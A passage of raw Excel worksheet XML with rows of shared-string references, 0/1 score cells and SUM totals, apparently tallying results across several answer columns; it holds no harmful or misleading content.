        <v>1</v>
      </c>
      <c r="F7" s="3" t="s">
        <v>27</v>
      </c>
      <c r="G7">
        <v>1</v>
      </c>
      <c r="H7">
        <v>1</v>
      </c>
    </row>
    <row r="8" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A8" s="3" t="s">
        <v>840</v>
      </c>
      <c r="B8" s="3" t="s">
        <v>29</v>
      </c>
      <c r="C8" s="3" t="s">
        <v>29</v>
      </c>
      <c r="D8" s="20">
        <v>1</v>
      </c>
      <c r="E8" s="20">
        <v>1</v>
      </c>
      <c r="F8" s="3" t="s">
        <v>29</v>
      </c>
      <c r="G8">
        <v>1</v>
      </c>
      <c r="H8">
        <v>1</v>
      </c>
    </row>
    <row r="9" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A9" s="3" t="s">
        <v>841</v>
      </c>
      <c r="B9" s="3" t="s">
        <v>842</v>
      </c>
      <c r="C9" s="3" t="s">
        <v>842</v>
      </c>
      <c r="D9" s="20">
        <v>1</v>
      </c>
      <c r="E9" s="20">
        <v>1</v>
      </c>
      <c r="F9" s="3" t="s">
        <v>842</v>
      </c>
      <c r="G9">
        <v>1</v>
      </c>
      <c r="H9">
        <v>1</v>
      </c>
    </row>
    <row r="10" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A10" s="3" t="s">
        <v>843</v>
      </c>
      <c r="B10" s="3" t="s">
        <v>844</v>
      </c>
      <c r="C10" s="3" t="s">
        <v>844</v>
      </c>
      <c r="D10" s="20">
        <v>1</v>
      </c>
      <c r="E10" s="20">
        <v>1</v>
      </c>
      <c r="F10" s="3" t="s">
        <v>844</v>
      </c>
      <c r="G10">
        <v>1</v>
      </c>
      <c r="H10">
        <v>1</v>
      </c>
    </row>
    <row r="11" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A11" s="3" t="s">
        <v>845</v>
      </c>
      <c r="B11" s="3" t="s">
        <v>846</v>
      </c>
      <c r="C11" s="3" t="s">
        <v>846</v>
      </c>
      <c r="D11" s="20">
        <v>1</v>
      </c>
      <c r="E11" s="20">
        <v>1</v>
      </c>
      <c r="F11" s="3" t="s">
        <v>846</v>
      </c>
      <c r="G11">
        <v>1</v>
      </c>
      <c r="H11">
        <v>1</v>
      </c>
    </row>
    <row r="12" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A12" s="3" t="s">
        <v>810</v>
      </c>
      <c r="B12" s="3" t="s">
        <v>40</v>
      </c>
      <c r="C12" s="3" t="s">
        <v>40</v>
      </c>
      <c r="D12" s="20">
        <v>1</v>
      </c>
      <c r="E12" s="20">
        <v>1</v>
      </c>
      <c r="F12" s="3" t="s">
        <v>40</v>
      </c>
      <c r="G12">
        <v>1</v>
      </c>
      <c r="H12">
        <v>1</v>
      </c>
    </row>
    <row r="13" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A13" s="3" t="s">
        <v>847</v>
      </c>
      <c r="B13" s="3" t="s">
        <v>848</v>
      </c>
      <c r="C13" s="3" t="s">
        <v>848</v>
      </c>
      <c r="D13" s="20">
        <v>1</v>
      </c>
      <c r="E13" s="20">
        <v>1</v>
      </c>
      <c r="F13" s="3" t="s">
        <v>848</v>
      </c>
      <c r="G13">
        <v>1</v>
      </c>
      <c r="H13">
        <v>1</v>
      </c>
    </row>
    <row r="14" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A14" s="3" t="s">
        <v>849</v>
      </c>
      <c r="B14" s="3"/>
      <c r="C14" s="3"/>
      <c r="F14" s="3"/>
    </row>
    <row r="15" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A15" s="3" t="s">
        <v>850</v>
      </c>
      <c r="B15" s="3"/>
      <c r="C15" s="3"/>
      <c r="F15" s="3"/>
    </row>
    <row r="16" spans="1:8" s="6" customFormat="1" ht="17.399999999999999" x14ac:dyDescent="0.3">
      <c r="A16" s="18" t="s">
        <v>41</v>
      </c>
      <c r="D16" s="6">
        <f>SUM(D4:D13)</f>
        <v>10</v>
      </c>
      <c r="E16" s="6">
        <f t="shared" ref="E16:H16" si="0">SUM(E4:E13)</f>
        <v>10</v>
      </c>
      <c r="F16" s="6">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="G16" s="6">
        <f t="shared" si="0"/>
        <v>10</v>
      </c>
      <c r="H16" s="6">
        <f t="shared" si="0"/>
        <v>10</v>
      </c>
    </row>
    <row r="19" spans="1:8" ht="25.2" x14ac:dyDescent="0.45">
      <c r="A19" s="25" t="s">
        <v>44</v>
      </c>
      <c r="B19" s="25"/>
      <c r="C19" s="25"/>
      <c r="D19" s="25"/>
      <c r="E19" s="25"/>
      <c r="F19" s="25"/>
      <c r="G19" s="25"/>
      <c r="H19" s="25"/>
    </row>
    <row r="20" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A20" s="4" t="s">
        <v>1</v>
      </c>
      <c r="B20" s="4" t="s">
        <v>2</v>
      </c>
      <c r="C20" s="4" t="s">
        <v>3</v>
      </c>
      <c r="D20" s="4" t="s">
        <v>5</v>
      </c>
      <c r="E20" s="4" t="s">
        <v>6</v>
      </c>
      <c r="F20" s="4" t="s">
        <v>4</v>
      </c>
      <c r="G20" s="4" t="s">
        <v>5</v>
      </c>
      <c r="H20" s="4" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="21" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A21" s="3" t="s">
        <v>45</v>
      </c>
      <c r="B21" s="3" t="s">
        <v>56</v>
      </c>
      <c r="C21" s="3" t="s">
        <v>45</v>
      </c>
      <c r="D21">
        <v>1</v>
      </c>
      <c r="E21">
        <v>1</v>
      </c>
      <c r="F21" s="3" t="s">
        <v>45</v>
      </c>
      <c r="G21">
        <v>1</v>
      </c>
      <c r="H21">
        <v>1</v>
      </c>
    </row>
    <row r="22" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A22" s="3" t="s">
        <v>46</v>
      </c>
      <c r="B22" s="3" t="s">
        <v>57</v>
      </c>
      <c r="C22" s="3" t="s">
        <v>57</v>
      </c>
      <c r="D22">
        <v>1</v>
      </c>
      <c r="E22">
        <v>1</v>
      </c>
      <c r="F22" s="3" t="s">
        <v>57</v>
      </c>
      <c r="G22">
        <v>1</v>
      </c>
      <c r="H22">
        <v>1</v>
      </c>
    </row>
    <row r="23" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A23" s="3" t="s">
        <v>1591</v>
      </c>
      <c r="B23" s="3" t="s">
        <v>1335</v>
      </c>
      <c r="C23" s="3" t="s">
        <v>1592</v>
      </c>
      <c r="D23">
        <v>1</v>
      </c>
      <c r="E23">
        <v>0</v>
      </c>
      <c r="F23" s="3" t="s">
        <v>1614</v>
      </c>
      <c r="G23">
        <v>1</v>
      </c>
      <c r="H23">
        <v>0</v>
      </c>
    </row>
    <row r="24" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A24" s="3" t="s">
        <v>1756</v>
      </c>
      <c r="B24" s="3" t="s">
        <v>1757</v>
      </c>
      <c r="C24" s="3" t="s">
        <v>1757</v>
      </c>
      <c r="D24">
        <v>1</v>
      </c>
      <c r="E24">
        <v>1</v>
      </c>
      <c r="F24" s="3" t="s">
        <v>1757</v>
      </c>
      <c r="G24">
        <v>1</v>
      </c>
      <c r="H24">
        <v>1</v>
      </c>
    </row>
    <row r="25" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A25" s="3" t="s">
        <v>1758</v>
      </c>
      <c r="B25" s="3" t="s">
        <v>1759</v>
      </c>
      <c r="C25" s="3" t="s">
        <v>1760</v>
      </c>
      <c r="D25">
        <v>1</v>
      </c>
      <c r="E25">
        <v>1</v>
      </c>
      <c r="F25" s="3" t="s">
        <v>1771</v>
      </c>
      <c r="G25">
        <v>1</v>
      </c>
      <c r="H25">
        <v>0</v>
      </c>
    </row>
    <row r="26" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A26" s="3" t="s">
        <v>1630</v>
      </c>
      <c r="B26" s="3" t="s">
        <v>62</v>
      </c>
      <c r="C26" s="3" t="s">
        <v>62</v>
      </c>
      <c r="D26">
        <v>1</v>
      </c>
      <c r="E26">
        <v>1</v>
      </c>
      <c r="F26" s="3" t="s">
        <v>62</v>
      </c>
      <c r="G26">
        <v>1</v>
      </c>
      <c r="H26">
        <v>1</v>
      </c>
    </row>
    <row r="27" spans="1:8" s="19" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A27" s="3"/>
      <c r="B27" s="3" t="s">
        <v>1061</v>
      </c>
      <c r="C27" s="3" t="s">
        <v>1061</v>
      </c>
      <c r="D27" s="19">
        <v>1</v>
      </c>
      <c r="E27" s="19">
        <v>1</v>
      </c>
      <c r="F27" s="3" t="s">
        <v>1061</v>
      </c>
      <c r="G27" s="19">
        <v>1</v>
      </c>
      <c r="H27" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="28" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A28" s="3" t="s">
        <v>1761</v>
      </c>
      <c r="B28" s="3" t="s">
        <v>1775</v>
      </c>
      <c r="C28" s="3" t="s">
        <v>1779</v>
      </c>
      <c r="D28">
        <v>1</v>
      </c>
      <c r="E28">
        <v>0</v>
      </c>
      <c r="F28" s="3" t="s">
        <v>1775</v>
      </c>
      <c r="G28">
        <v>1</v>
      </c>
      <c r="H28">
        <v>1</v>
      </c>
    </row>
    <row r="29" spans="1:8" s="19" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A29" s="3"/>
      <c r="B29" s="3" t="s">
        <v>1776</v>
      </c>
      <c r="C29" s="3" t="s">
        <v>1198</v>
      </c>
      <c r="D29" s="19">
        <v>1</v>
      </c>
      <c r="E29" s="19">
        <v>1</v>
      </c>
      <c r="F29" s="3" t="s">
        <v>1925</v>
      </c>
      <c r="G29" s="19">
        <v>1</v>
      </c>
      <c r="H29" s="19">
        <v>0</v>
      </c>
    </row>
    <row r="30" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A30" s="3" t="s">
        <v>1762</v>
      </c>
      <c r="B30" s="3" t="s">
        <v>1777</v>
      </c>
      <c r="C30" s="3" t="s">
        <v>1772</v>
      </c>
      <c r="D30">
        <v>1</v>
      </c>
      <c r="E30">
        <v>1</v>
      </c>
      <c r="F30" s="3" t="s">
        <v>1772</v>
      </c>
      <c r="G30">
        <v>1</v>
      </c>
      <c r="H30">
        <v>1</v>
      </c>
    </row>
    <row r="31" spans="1:8" s="19" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A31" s="3"/>
      <c r="B31" s="3" t="s">
        <v>1778</v>
      </c>
      <c r="C31" s="3" t="s">
        <v>1780</v>
      </c>
      <c r="D31" s="19">
        <v>1</v>
      </c>
      <c r="E31" s="19">
        <v>1</v>
      </c>
      <c r="F31" s="3" t="s">
        <v>1780</v>
      </c>
      <c r="G31" s="19">
        <v>1</v>
      </c>
      <c r="H31" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="32" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A32" s="3" t="s">
        <v>1763</v>
      </c>
      <c r="B32" s="3" t="s">
        <v>1064</v>
      </c>
      <c r="C32" s="3" t="s">
        <v>1064</v>
      </c>
      <c r="D32">
        <v>1</v>
      </c>
      <c r="E32">
        <v>1</v>
      </c>
      <c r="F32" s="3" t="s">
        <v>1064</v>
      </c>
      <c r="G32">
        <v>1</v>
      </c>
      <c r="H32">
        <v>1</v>
      </c>
    </row>
    <row r="33" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A33" s="3" t="s">
        <v>1478</v>
      </c>
      <c r="B33" s="3" t="s">
        <v>68</v>
      </c>
      <c r="C33" s="3" t="s">
        <v>1288</v>
      </c>
      <c r="D33">
        <v>1</v>
      </c>
      <c r="E33">
        <v>1</v>
      </c>
      <c r="F33" s="3" t="s">
        <v>1288</v>
      </c>
      <c r="G33" s="19">
        <v>1</v>
      </c>
      <c r="H33" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="34" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A34" s="3" t="s">
        <v>1479</v>
      </c>
      <c r="B34" s="3" t="s">
        <v>71</v>
      </c>
      <c r="C34" s="3" t="s">
        <v>71</v>
      </c>
      <c r="D34">
        <v>1</v>
      </c>
      <c r="E34">
        <v>1</v>
      </c>
      <c r="F34" s="3" t="s">
        <v>71</v>
      </c>
      <c r="G34" s="19">
        <v>1</v>
      </c>
      <c r="H34" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="35" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A35" s="3" t="s">
        <v>1764</v>
      </c>
      <c r="B35" s="3" t="s">
        <v>1765</v>
      </c>
      <c r="C35" s="3" t="s">
        <v>1766</v>
      </c>
      <c r="D35">
        <v>1</v>
      </c>
      <c r="E35">
        <v>1</v>
      </c>
      <c r="F35" s="3" t="s">
        <v>1773</v>
      </c>
      <c r="G35" s="19">
        <v>1</v>
      </c>
      <c r="H35" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="36" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A36" s="3" t="s">
        <v>1767</v>
      </c>
      <c r="B36" s="3" t="s">
        <v>1767</v>
      </c>
      <c r="C36" s="3" t="s">
        <v>1767</v>
      </c>
      <c r="D36">
        <v>1</v>
      </c>
      <c r="E36">
        <v>1</v>
      </c>
      <c r="F36" s="3" t="s">
        <v>1767</v>
      </c>
      <c r="G36" s="19">
        <v>1</v>
      </c>
      <c r="H36" s="19">
        <v>1</v>
      </c>
    </row>
    <row r="37" spans="1:8" ht="82.8" x14ac:dyDescent="0.25">
      <c r="A37" s="3" t="s">
        <v>1768</v>
      </c>
      <c r="B37" s="3" t="s">
        <v>1769</v>
      </c>
      <c r="C37" s="3" t="s">
        <v>1770</v>
      </c>
      <c r="D37">
        <v>0</v>
      </c>
      <c r="E37">
        <v>0</v>
      </c>
      <c r="F37" s="3" t="s">
        <v>1774</v>
      </c>
      <c r="G37">
        <v>1</v>
      </c>
      <c r="H37">
        <v>1</v>
      </c>
    </row>
    <row r="38" spans="1:8" s="6" customFormat="1" ht="17.399999999999999" x14ac:dyDescent="0.3">
      <c r="A38" s="18" t="s">
        <v>41</v>
      </c>
      <c r="D38" s="6">
        <f>SUM(D21:D37)</f>
        <v>16</v>
      </c>
      <c r="E38" s="6">
        <f t="shared" ref="E38:H38" si="1">SUM(E21:E37)</f>
        <v>14</v>
      </c>
      <c r="F38" s="6">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="G38" s="6">
        <f t="shared" si="1"/>
        <v>17</v>
      </c>
      <c r="H38" s="6">
        <f t="shared" si="1"/>
        <v>14</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="3">
    <mergeCell ref="A1:H1"/>
    <mergeCell ref="A2:H2"/>
    <mergeCell ref="A19:H19"/>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FE1CF-8D8B-4237-88A4-23429451F658}">
  <dimension ref="A1:H86"/>
  <sheetViews>
    <sheetView topLeftCell="A83" workbookViewId="0">
      <selection activeCell="C62" sqref="C62:E85"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="13.8" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="2" width="26.6640625" customWidth="1"/>
    <col min="3" max="3" width="26.5546875" customWidth="1"/>
    <col min="4" max="4" width="9.88671875" customWidth="1"/>
    <col min="5" max="5" width="10.21875" customWidth="1"/>
    <col min="6" max="6" width="26.6640625" customWidth="1"/>
    <col min="7" max="7" width="9.6640625" customWidth="1"/>
    <col min="8" max="8" width="10.33203125" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:8" ht="28.2" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A1" s="29" t="s">
        <v>851</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x14ac:dyDescent="0.25">
      <c r="A4" s="3" t="s">
        <v>385</v>
      </c>
      <c r="B4" s="3" t="s">
        <v>103</v>
      </c>
      <c r="C4" s="3" t="s">
        <v>103</v>
      </c>
      <c r="D4">
        <v>1</v>
      </c>
      <c r="E4">
        <v>1</v>
      </c>
      <c r="F4" s="3" t="s">
        <v>103</v>
      </c>
      <c r="G4">
        <v>1</v>
      </c>
      <c r="H4">
        <v>1</v>
      </c>
    </row>
    <row r="5" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A5" s="3" t="s">
        <v>852</v>
      </c>
      <c r="B5" s="3" t="s">
        <v>853</v>
      </c>
      <c r="C5" s="3" t="s">
        <v>853</v>
      </c>
      <c r="D5">
        <v>1</v>
      </c>
      <c r="E5">
        <v>1</v>
      </c>
      <c r="F5" s="3" t="s">
        <v>853</v>
      </c>
      <c r="G5">
        <v>1</v>
      </c>
      <c r="H5">
        <v>1</v>
      </c>
    </row>
    <row r="6" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A6" s="3" t="s">
        <v>854</v>
      </c>
      <c r="B6" s="3" t="s">
        <v>855</v>
      </c>
      <c r="C6" s="3" t="s">
        <v>855</v>
      </c>
      <c r="D6">
        <v>1</v>
      </c>
      <c r="E6">
        <v>1</v>
      </c>
      <c r="F6" s="3" t="s">
        <v>855</v>
      </c>
      <c r="G6">
        <v>1</v>
      </c>
      <c r="H6">
        <v>1</v>
      </c>
    </row>
    <row r="7" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A7" s="3" t="s">
        <v>856</v>
      </c>
      <c r="B7" s="3" t="s">
        <v>857</v>
      </c>
      <c r="C7" s="3" t="s">
        <v>857</v>
      </c>
      <c r="D7">
        <v>1</v>
      </c>
      <c r="E7">
        <v>1</v>
      </c>
      <c r="F7" s="3" t="s">
        <v>857</v>
      </c>
      <c r="G7">
        <v>1</v>
      </c>
      <c r="H7">
        <v>1</v>
      </c>
    </row>
    <row r="8" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A8" s="3" t="s">
        <v>641</v>
      </c>
      <c r="B8" s="3" t="s">
        <v>114</v>
      </c>
      <c r="C8" s="3" t="s">
        <v>114</v>
      </c>
      <c r="D8">
        <v>1</v>
      </c>
      <c r="E8">
        <v>1</v>
      </c>
      <c r="F8" s="3" t="s">
        <v>711</v>
      </c>
      <c r="G8">
        <v>1</v>
      </c>
      <c r="H8">
        <v>0</v>
      </c>
    </row>
    <row r="9" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A9" s="3" t="s">
        <v>858</v>
      </c>
      <c r="B9" s="3" t="s">
        <v>859</v>
      </c>
      <c r="C9" s="3" t="s">
        <v>859</v>
      </c>
      <c r="D9">
        <v>1</v>
      </c>
      <c r="E9">
        <v>1</v>
      </c>
      <c r="F9" s="3" t="s">
        <v>859</v>
      </c>
      <c r="G9">
        <v>1</v>
      </c>
      <c r="H9">
        <v>1</v>
      </c>
    </row>
    <row r="10" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A10" s="3" t="s">
        <v>860</v>
      </c>
      <c r="B10" s="3" t="s">
        <v>861</v>
      </c>
      <c r="C10" s="3" t="s">
        <v>911</v>
      </c>
      <c r="D10">
        <v>1</v>
      </c>
      <c r="E10">
        <v>0</v>
      </c>
      <c r="F10" s="3" t="s">
        <v>861</v>
      </c>
      <c r="G10">
        <v>1</v>
      </c>
      <c r="H10">
        <v>1</v>
      </c>
    </row>
    <row r="11" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A11" s="3" t="s">
        <v>862</v>
      </c>
      <c r="B11" s="3" t="s">
        <v>863</v>
      </c>
      <c r="C11" s="3" t="s">
        <v>912</v>
      </c>
      <c r="D11">
        <v>1</v>
      </c>
      <c r="E11">
        <v>1</v>
      </c>
      <c r="F11" s="3" t="s">
        <v>925</v>
      </c>
      <c r="G11">
        <v>1</v>
      </c>
      <c r="H11">
        <v>0</v>
      </c>
    </row>
    <row r="12" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A12" s="3" t="s">
        <v>864</v>
      </c>
      <c r="B12" s="3" t="s">
        <v>865</v>
      </c>
      <c r="C12" s="3" t="s">
        <v>1926</v>
      </c>
      <c r="D12">
        <v>0</v>
      </c>
      <c r="E12">
        <v>0</v>
      </c>
      <c r="F12" s="3" t="s">
        <v>865</v>
      </c>
      <c r="G12">
        <v>1</v>
      </c>
      <c r="H12">
        <v>1</v>
      </c>
    </row>
    <row r="13" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A13" s="3" t="s">
        <v>866</v>
      </c>
      <c r="B13" s="3" t="s">
        <v>867</v>
      </c>
      <c r="C13" s="3" t="s">
        <v>867</v>
      </c>
      <c r="D13">
        <v>1</v>
      </c>
      <c r="E13">
        <v>1</v>
      </c>
      <c r="F13" s="3" t="s">
        <v>926</v>
      </c>
      <c r="G13">
        <v>1</v>
      </c>
      <c r="H13">
        <v>0</v>
      </c>
    </row>
    <row r="14" spans="1:8" ht="69" x14ac:dyDescent="0.25">
      <c r="A14" s="3" t="s">
        <v>868</v>
      </c>
      <c r="B14" s="3" t="s">
        <v>869</v>
      </c>
      <c r="C14" s="3" t="s">
        <v>914</v>
      </c>
      <c r="D14">
        <v>1</v>
      </c>
      <c r="E14">
        <v>1</v>
      </c>
      <c r="F14" s="3" t="s">
        <v>914</v>
      </c>
      <c r="G14">
        <v>1</v>
      </c>
      <c r="H14">
        <v>1</v>
      </c>
    </row>
    <row r="15" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A15" s="3" t="s">
        <v>870</v>
      </c>
      <c r="B15" s="3" t="s">
        <v>871</v>
      </c>
      <c r="C15" s="3" t="s">
        <v>871</v>
      </c>
      <c r="D15">
        <v>1</v>
      </c>
      <c r="E15">
        <v>1</v>
      </c>
      <c r="F15" s="3" t="s">
        <v>871</v>
      </c>
      <c r="G15">
        <v>1</v>
      </c>
      <c r="H15">
        <v>1</v>
      </c>
    </row>
    <row r="16" spans="1:8" ht="82.8" x14ac:dyDescent="0.25">
      <c r="A16" s="3" t="s">
        <v>872</v>
      </c>
      <c r="B16" s="3" t="s">
        <v>873</v>
      </c>
      <c r="C16" s="3" t="s">
        <v>915</v>
      </c>
      <c r="D16">
        <v>0</v>
      </c>
      <c r="E16">
        <v>0</v>
      </c>
      <c r="F16" s="3" t="s">
        <v>927</v>
      </c>
      <c r="G16">
        <v>1</v>
      </c>
      <c r="H16">
        <v>1</v>
      </c>
    </row>
    <row r="17" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A17" s="3" t="s">
        <v>874</v>
      </c>
      <c r="B17" s="3" t="s">
        <v>875</v>
      </c>
      <c r="C17" s="3" t="s">
        <v>916</v>
      </c>
      <c r="D17">
        <v>0</v>
      </c>
      <c r="E17">
        <v>0</v>
      </c>
      <c r="F17" s="3" t="s">
        <v>875</v>
      </c>
      <c r="G17">
        <v>1</v>
      </c>
      <c r="H17">
        <v>1</v>
      </c>
    </row>
    <row r="18" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A18" s="3" t="s">
        <v>862</v>
      </c>
      <c r="B18" s="3" t="s">
        <v>863</v>
      </c>
      <c r="C18" s="3" t="s">
        <v>912</v>
      </c>
      <c r="D18">
        <v>1</v>
      </c>
      <c r="E18">
        <v>1</v>
      </c>
      <c r="F18" s="3" t="s">
        <v>925</v>
      </c>
      <c r="G18">
        <v>1</v>
      </c>
      <c r="H18">
        <v>0</v>
      </c>
    </row>
    <row r="19" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A19" s="3" t="s">
        <v>876</v>
      </c>
      <c r="B19" s="3" t="s">
        <v>865</v>
      </c>
      <c r="C19" s="3" t="s">
        <v>913</v>
      </c>
      <c r="D19">
        <v>1</v>
      </c>
      <c r="E19">
        <v>0</v>
      </c>
      <c r="F19" s="3" t="s">
        <v>865</v>
      </c>
      <c r="G19">
        <v>1</v>
      </c>
      <c r="H19">
        <v>1</v>
      </c>
    </row>
    <row r="20" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A20" s="3" t="s">
        <v>877</v>
      </c>
      <c r="B20" s="3" t="s">
        <v>867</v>
      </c>
      <c r="C20" s="3" t="s">
        <v>867</v>
      </c>
      <c r="D20">
        <v>1</v>
      </c>
      <c r="E20">
        <v>1</v>
      </c>
      <c r="F20" s="3" t="s">
        <v>867</v>
      </c>
      <c r="G20">
        <v>1</v>
      </c>
      <c r="H20">
        <v>1</v>
      </c>
    </row>
    <row r="21" spans="1:8" ht="69" x14ac:dyDescent="0.25">
      <c r="A21" s="3" t="s">
        <v>868</v>
      </c>
      <c r="B21" s="3" t="s">
        <v>869</v>
      </c>
      <c r="C21" s="3" t="s">
        <v>914</v>
      </c>
      <c r="D21">
        <v>1</v>
      </c>
      <c r="E21">
        <v>1</v>
      </c>
      <c r="F21" s="3" t="s">
        <v>914</v>
      </c>
      <c r="G21">
        <v>1</v>
      </c>
      <c r="H21">
        <v>1</v>
      </c>
    </row>
    <row r="22" spans="1:8" ht="82.8" x14ac:dyDescent="0.25">
      <c r="A22" s="3" t="s">
        <v>878</v>
      </c>
      <c r="B22" s="3" t="s">
        <v>879</v>
      </c>
      <c r="C22" s="3" t="s">
        <v>917</v>
      </c>
      <c r="D22">
        <v>0</v>
      </c>
      <c r="E22">
        <v>0</v>
      </c>
      <c r="F22" s="3" t="s">
        <v>928</v>
      </c>
      <c r="G22">
        <v>1</v>
      </c>
      <c r="H22">
        <v>1</v>
      </c>
    </row>
    <row r="23" spans="1:8" ht="96.6" x14ac:dyDescent="0.25">
      <c r="A23" s="3" t="s">
        <v>880</v>
      </c>
      <c r="B23" s="3" t="s">
        <v>881</v>
      </c>
      <c r="C23" s="3" t="s">
        <v>918</v>
      </c>
      <c r="D23">
        <v>1</v>
      </c>
      <c r="E23">
        <v>1</v>
      </c>
      <c r="F23" s="3" t="s">
        <v>929</v>
      </c>
      <c r="G23">
        <v>1</v>
      </c>
      <c r="H23">
        <v>0</v>
      </c>
    </row>
    <row r="24" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A24" s="3" t="s">
        <v>882</v>
      </c>
      <c r="B24" s="3" t="s">
        <v>883</v>
      </c>
      <c r="C24" s="3" t="s">
        <v>26</v>
      </c>
      <c r="D24">
        <v>1</v>
      </c>
      <c r="E24">
        <v>1</v>
      </c>
      <c r="F24" s="3" t="s">
        <v>883</v>
      </c>
      <c r="G24">
        <v>1</v>
      </c>
      <c r="H24">
        <v>1</v>
      </c>
    </row>
    <row r="25" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A25" s="3" t="s">
        <v>884</v>
      </c>
      <c r="B25" s="3" t="s">
        <v>885</v>
      </c>
      <c r="C25" s="3" t="s">
        <v>885</v>
      </c>
      <c r="D25">
        <v>1</v>
      </c>
      <c r="E25">
        <v>1</v>
      </c>
      <c r="F25" s="3" t="s">
        <v>885</v>
      </c>
      <c r="G25">
        <v>1</v>
      </c>
      <c r="H25">
        <v>1</v>
      </c>
    </row>
    <row r="26" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A26" s="3" t="s">
        <v>801</v>
      </c>
      <c r="B26" s="3" t="s">
        <v>26</v>
      </c>
      <c r="C26" s="3" t="s">
        <v>26</v>
      </c>
      <c r="D26">
        <v>1</v>
      </c>
      <c r="E26">
        <v>1</v>
      </c>
      <c r="F26" s="3" t="s">
        <v>26</v>
      </c>
      <c r="G26">
        <v>1</v>
      </c>
      <c r="H26">
        <v>1</v>
      </c>
    </row>
    <row r="27" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A27" s="3" t="s">
        <v>802</v>
      </c>
      <c r="B27" s="3" t="s">
        <v>27</v>
      </c>
      <c r="C27" s="3" t="s">
        <v>27</v>
      </c>
      <c r="D27">
        <v>1</v>
      </c>
      <c r="E27">
        <v>1</v>
      </c>
      <c r="F27" s="3" t="s">
        <v>27</v>
      </c>
      <c r="G27">
        <v>1</v>
      </c>
      <c r="H27">
        <v>1</v>
      </c>
    </row>
    <row r="28" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A28" s="3" t="s">
        <v>886</v>
      </c>
      <c r="B28" s="3" t="s">
        <v>331</v>
      </c>
      <c r="C28" s="3" t="s">
        <v>331</v>
      </c>
      <c r="D28">
        <v>1</v>
      </c>
      <c r="E28">
        <v>1</v>
      </c>
      <c r="F28" s="3" t="s">
        <v>331</v>
      </c>
      <c r="G28">
        <v>1</v>
      </c>
      <c r="H28">
        <v>1</v>
      </c>
    </row>
    <row r="29" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A29" s="3" t="s">
        <v>887</v>
      </c>
      <c r="B29" s="3" t="s">
        <v>888</v>
      </c>
      <c r="C29" s="3" t="s">
        <v>888</v>
      </c>
      <c r="D29">
        <v>1</v>
      </c>
      <c r="E29">
        <v>1</v>
      </c>
      <c r="F29" s="3" t="s">
        <v>888</v>
      </c>
      <c r="G29">
        <v>1</v>
      </c>
      <c r="H29">
        <v>1</v>
      </c>
    </row>
    <row r="30" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A30" s="3" t="s">
        <v>889</v>
      </c>
      <c r="B30" s="3" t="s">
        <v>890</v>
      </c>
      <c r="C30" s="3" t="s">
        <v>919</v>
      </c>
      <c r="D30">
        <v>1</v>
      </c>
      <c r="E30">
        <v>1</v>
      </c>
      <c r="F30" s="3" t="s">
        <v>919</v>
      </c>
      <c r="G30">
        <v>1</v>
      </c>
      <c r="H30">
        <v>1</v>
      </c>
    </row>
    <row r="31" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A31" s="3" t="s">
        <v>891</v>
      </c>
      <c r="B31" s="3" t="s">
        <v>892</v>
